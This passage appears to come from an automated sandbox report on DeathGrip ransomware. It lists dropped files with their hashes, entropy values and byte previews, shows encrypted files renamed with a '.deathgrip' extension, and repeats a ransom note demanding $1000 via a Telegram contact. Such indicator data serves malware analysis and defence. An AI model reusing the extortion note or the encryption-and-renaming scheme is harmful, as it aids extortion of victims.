                                                          Preview:........Ma...z....@oZ.'.*i....X.2i....6\-..NA.%.4.J.6..$..Qx.k&X.u.\n.....;.2C.|...w.-...+`.A#.yjs7t....K.C......6& u......Qm..}.v..Hr....U..xF.Auq....6.(j...7s0.;....o.7.=..0.~1..B.......ZY..G./.RqDa...oK.p....M.r...........e3.{"r...i.lW......Zd.e.eE\..CT.7......X{F.tH.1...Y.%..P39.......P.v...n.........E.k..>]..s.....8........R.s......U. .N..0~.c..<..uB.v./..c.nd<...W/..).vB.U_i..k.hN4..^.wG...i.v...#p.&Yp.....$d...wc.O.x...SO.....^S..=...{..E...(......=_..b...6a.p.e......_j.."...{..........l.38'fP....l....nF..c....vM..2).P.J...F3..+!@:.2.?.Wi...Vj..P..}..K@ZVt....w....ci....sQPD'h..9ZC..N.......P|4.{....:V...9.(......]U.Q...5.#'F.'..q......f[....1....Z.2.\.:(.c.R.@s.@.........!.........?..PG..1.d......q.E.WD...?Ju........Mg.Z..%.$..|..W...S..{(.)w.5. .~......='...~.=.....U.....z......4..}+{?.0.F ......../#H&_...i`.o.... ..B..a.....0.........S...Q....F.......|.8........N.f.=.~~.....w..:.}..Z?.F1.......M.......X=B..7....j..1

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache-current.bin

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache-current.bin.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3008
                                                          Entropy (8bit):7.916079589722619
                                                          Encrypted:false
                                                          SSDEEP:48:JYLxx4a2PX79YLL7AAUu1Og+YRY13GbmD6q5HWI3p5tnZXDjLg8SJiO9iNSa69hn:JYL34xKhU2bX3ID2SDd9DjnSJIw3TQs3
                                                          MD5:764EFA4ABBA2BADB2B55D479A96B916B
                                                          SHA1:C141221E88574902237C8E1A5EACAFA186950FFF
                                                          SHA-256:E06A6B42CBA25B4EA9DF1A80885055309D43B2DE5DFCF82222043DE92CA83C08
                                                          SHA-512:587D21032A1F83E163FEB125F78C6265EA9C94C435766F43C341BAE83BE73BC2B827CA70D60FE141B8CA75BF936C3B056BEF312165233CD2E2F2378625FA63A4
                                                          Malicious:false
                                                          Preview:..........<.....31.nUX.L..bB.w.y.&SC.@.S..q...,".Q...........u..<..p...xB...h"{.V...6P...Z..cG.~."C..N.f(.!p.c...!W..6$e..p.IC8...D7...A.Z.m.>.m..S.".N....G&..y.!\........i.0...{k.=bu..._....S...-......SO'"K.../v&...4u....B?w|.ss....F..x.....d..z||......v. '.?&...[.H}z..e.k..Pp...4......U .R.F....:.?....u.[....../.#..2Jc..:6.....(..>FWxu)...V.-.......j.....TE._I.eH.....@.k...|.z....B.R......U..l..vz.q....#....X..-.....;..o...{.....Us..h.E..._.g...wr'L....w3..........~.Y.........?..."...o..(.us..w@"6.]......x.....0..^.nb./o.0.b.sp.4.E...{....G...%..s..../.PQ.J/\..^..b....f.?.E......"...uI...........U.p=....O.3p.H....fL.._...'I.V.q..}Q~.......v+@.j2.X.......S....~.k...V...4..._X..H...x..].Y.........P........NI..+./9o.....P..z...]........M....UK.p\.........2_..?.../.H..J..E..b._....n.p....-s.C.jn......7......!..1.d...">..l?A.@.(+.s..r......z.Eo%2.....V...X.8$.Yj...IA.*...!dd!Z.1..V..5.L...;P...~..{...XpB.v.n..b......7......,mL?S..:

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache.bin

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache.bin.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3760
                                                          Entropy (8bit):7.928336462469674
                                                          Encrypted:false
                                                          SSDEEP:96:639K4kDoPtr2L64gCk+8YS7Md5A28xU05:6QRgCL6tj76/UUu
                                                          MD5:230A0D1B2F1D57330CDBB185B78B440D
                                                          SHA1:461238BDFA2A5FE86E7B4B4CDBA4BAA23328F784
                                                          SHA-256:0AE5D1DC206C92BB32FA5BB12A02456D333087B1BC663FA5947EE1B98782403B
                                                          SHA-512:1646D651784D1E1F23198CC927A38558AAFE28D43C9333442D78548F9F1E5F0EC0CA27852D36576F90E733A818D454987A9132C67ED7A21A6BAC53F460CA3EF8
                                                          Malicious:false
                                                          Preview:.........2.....~R...Z..r../..*sf.CBe.q.......h@W..+.TC...t.......Q......M..5.....Z.........]o...u..4...U...Z.7LmMNW...wL...t...F>=.~...X..Z...;..4...i..S...I...!....&Zf..!t...B.S..$L3...F.......8..k.q.S......G...e.J..... c$k.J..S...(.u..'hR..#....@./....WQa.NQ..$X+......X.N.....4..q.....S.... ...b.T..V.....9@....6...h.$......ABou6...+>.....A...6.--..zh3w5......P....t..+.`..k......FB....a.M.!."H..:K.ZH.#\...H...W..,.T{.+...@? ..A...gN.&..Y.2....@....Y8.q.m.A.R....;..Z...R.......z\fM..=.....\:..3.Hp..{4I.H..rQ..P..Z.....4.l......1c....=....'...t.......&....9..KP...kI.{.#..Q0......._...{-..n...'...w.E?...d}4A.].p.....9aCL7~.......$.2..O.i.7;...aC...c..l....qm.{.1'!.8R).`<...u.\..z...t.<.A#..Q.F7...HS.?u..#FN.....g.h.<...8NP>....z.G.%L.u....C.2.....!.o.x~.K..Z...h.wW.E.0~r..{.....H.7f.$^.\".l.t.....n.p:...a.o......*.....Y.tt.DIk...\E...)J..@.....(.<{....ZY..Yz..1.?..2..;.Bqc2.<.h.=....H.'...b:.]...'I|......i....9.}/.+.`|...[.q.1.m..F.

                                                          C:\Users\jones\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\AppCache\EQDGIKYN\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCookies\ESE\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5cb42c4d-9247-46d3-959b-9aafe402a01c}\0.0.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5cb42c4d-9247-46d3-959b-9aafe402a01c}\0.1.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5cb42c4d-9247-46d3-959b-9aafe402a01c}\0.2.filtertrie.intermediate.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5cb42c4d-9247-46d3-959b-9aafe402a01c}\0.2.filtertrie.intermediate.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1426256
                                                          Entropy (8bit):7.999859935701533
                                                          Encrypted:true
                                                          SSDEEP:24576:0UYRf/zWb6rlNtS3oiVsVEBFIxVJxM0qT7iOI1zMMoGQsyPUi/WZ2k7BD3Pbvy4u:skXVSEBus0y7zUMVGQfcXhRfu
                                                          MD5:6A731AA0C5BFF6C2FFD6F8809C054643
                                                          SHA1:C3E0BD9CAD028DFEAEB2567D95B98E8554626761
                                                          SHA-256:A613CC2C8C50BB386C4F7FDD0EBADF401F7640856E859C81A4AA433C74AD0B7F
                                                          SHA-512:C6D0B9E8406C7690429EAEB98631F45DB0B472BB3F89CEBA4F427A869D09EBB94C24F66F47D3DEABCF012637C6B5F55DCA3F4FF4EFED68862321B7B15A659EE7
                                                          Malicious:true
                                                          Preview:........-J.p..a..-~......L`.O.\..U2.3h...)*<......!|.z.Dx..l{.....r..7./...!...X.N:.'"..B..O.!`.g.B.b.+..SKf>.(...;.0..Pe./.F.D./Ivv..x.....;|h..z.9?..k.........<.r}'............u..[.PD.1.\k..&{..>ssR..;.....x.......0.z&*...7<[.Y0#.......~....cA..D*..w......D.p..0..I;#.....>K..h.@.q.QR...rM...G.a.=.+.NvZU.e..k%.'9........F.C.X4n.`..8z6.Y....L!,.........P..~...Z.G.v..\MA.N....y..~..."w.......m)....j..MFTjpmY...C........).Y.G.....e...L.Y..,.p..@..u......-.\.!p5:y..V.~N;...*E.V=.l.7h....J.e..R..C.)QU._s..xk.a..*..w....p.Zy.u\tC..[.;a'.fm..Un6..\e.}.......G..!Ex.Xs2..<...jzd.Ten%.l..!..@/@......2..u.L...B.D.OM;...V....=....F..\R.$]....I.Q.s..]1.......q4|).'......B+.2S}f......@.X..v.[R..y..*_Wk..=..&o..HoMl.e.:.:+.G&.J..C...\....5....S..S...@`.l..].P......Y..............88..&.~O!Z.`.....4.uR.c..e.*u.o..p...T{...8#P.Es..a......5.;6.W.fB.;.....[..v}...P.p6..F}cM.z.l.k...q...M...aM..... .y..).cWu.m.....+..&....*..k.~.`F?<.-p"C..S..2..{z.....KOw..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):352096
                                                          Entropy (8bit):7.99944515345235
                                                          Encrypted:true
                                                          SSDEEP:6144:e+CSvcQgm4ZCGW/mRS7WxiLev1wChF6PyRbPImwL6CZX+FwZni:ef4cQgm4ONWWI1wChFftAmwL6AX+FwZi
                                                          MD5:ADCB1CA9BC75660BF20B7A32E687161B
                                                          SHA1:B1FD13A1D91FF68B8FBBA4B86E82BEFCA02E0183
                                                          SHA-256:A1060CB9714B1E88D452470841C6F30441182A1FBC1DABE9349A8D16E87DAA24
                                                          SHA-512:89C0496877A89D374087299C62BA77AB8AE8B29EE6C325DEC3E7F31573403BDB8ADA55976EB2257FB61B3F9AAC5C3F00BB0A243E93A630BE586B6D2F00F1F6C1
                                                          Malicious:true
                                                          Preview:........._.?..=....}....../5$...&.....#..{.~.!.O.2zbQZ........._r_......~...... .Q.}*.<yo...j-.R.....A..g7S...BX..`...f........Ux.vV.0~..s9......]....3....1J.Y.k-..!.2.v0i2ZI...B..!..2...Q..A..-..a..2.*......`u.zP.h....km-.C..3~.4{...utCr.....a..U...t...e..........m.L.U5....{.2@"se}g..&`D..nbd8.C.....r..I.R!.t...F.^cc. ..cy5.1q.v.PW..f.d...W.I..k....6.$.a....m...-..w?.-..@.....u.~........E.b.....0........[..z.`.|...j......Z.6.+..E..{.NR..c"....i5QZ.Y..F..U.0X..x6.....ZP(R.K..~.,......ZUz..(....V.D.S.5..C.....u.W.|)...H..(zW9R...U......i9cU.r$.'...!.....Hq.t..2oX... .c.*.J s.[Wl.]*..j.........$..O....F.D...#;..b..a.n..Ka.....7,...-......D Z...........M.Z..m.....x".]...Plf.%.._..*.W.....a...P......r.......[./u...m.b4...$....^..d..f.p..."-.c..q...p.H.9L..;AM...F...~..O.xX.ZC3.*0...u....4h.n.]..`|..2...T.fD....6W.<B.0..E\w.p!..8.P........H...FiC..+..[.#E..=._.m..|O.z|......R....n.4+....O=..]{n..U.0,....T...s..3..8W....2.)]G.Q.. (`j.ic.cO...Pn...A..a.r....

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):243856
                                                          Entropy (8bit):7.999287890509857
                                                          Encrypted:true
                                                          SSDEEP:6144:GJZZo2CJx22VxsBZcNFdNrsmA8nPz6JYKDYz3gNeEtfAJU:akC2gBZcNNA8nP7KDI+RfAW
                                                          MD5:708F5E99A893A3B5583DAD3D8055E9C1
                                                          SHA1:D224308BBA4B3474383D9F253306DB6996E07C91
                                                          SHA-256:D983275DF82A9382D2592CA288B326E3C8D9D27438292EC5E5B307960C6E449E
                                                          SHA-512:C62CB3BCA2145A947FC296EE87EA90B80A9A45A4979D0DFD350ADC9E1701CD5CC71D0E169ACAEBABAB72D00595FF1F586B11A39458C2CC14478592F6A0135FD5
                                                          Malicious:true
                                                          Preview:.........L..j.g.............i....T}...D.BTQp\.c..B...K.K.....'~..{..|..].y.{k..*.....[.....Y..R\o..d.?...d.bm.......[#....W.hRkU..F.u..y.C...S (.m....t..-@..'.:...{y..:..6..r.6..$...M%_.E.,n.#.?..."t........~.o.......T.y..t3z.\.}p....w.v.y...<.. a.REc. u.R[0N....~...t0.]O8VjdM.;+..1....7....,:...}Y...;0..E.D....J.....:-.G....t.....^..g..U<..%=.j..6...>....Mj...,..k..q.y.?S!j'..;..p..^.~.U,864.7..../.J..Na\.3B...Q.WHH..x.x..c.....T.F^.......B...sq.n......P..,.\Z#....;.s......n...Aj..l.aT)....4..!.....u.2....u..\-.i.......-..9.e.g.,.`.S....W-....>.Ih+......pv..!..B.>..8.........v..s8..7....d.js.......>,XZ-....,.3I..9.L..:.H....p.1.".d$.b)..k....zA.n..<7.6...,....X...k*|.....s..........s0...7:....b....).l|H.U!r.7Y.W.[....r.G..,.}.......`K.Qj.L..:f.G#...;.....*'._....q......?.;3-..pC.....l..*<l.F.....A...=.<...4.C.!../.......U..S....]..5.........<....F.Gc..B...c.l.N.0.L]..,-.T-....Q...]C.dA..7..t..B..*_..j.u1U..r."..R8.C....ML...#.xEy

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

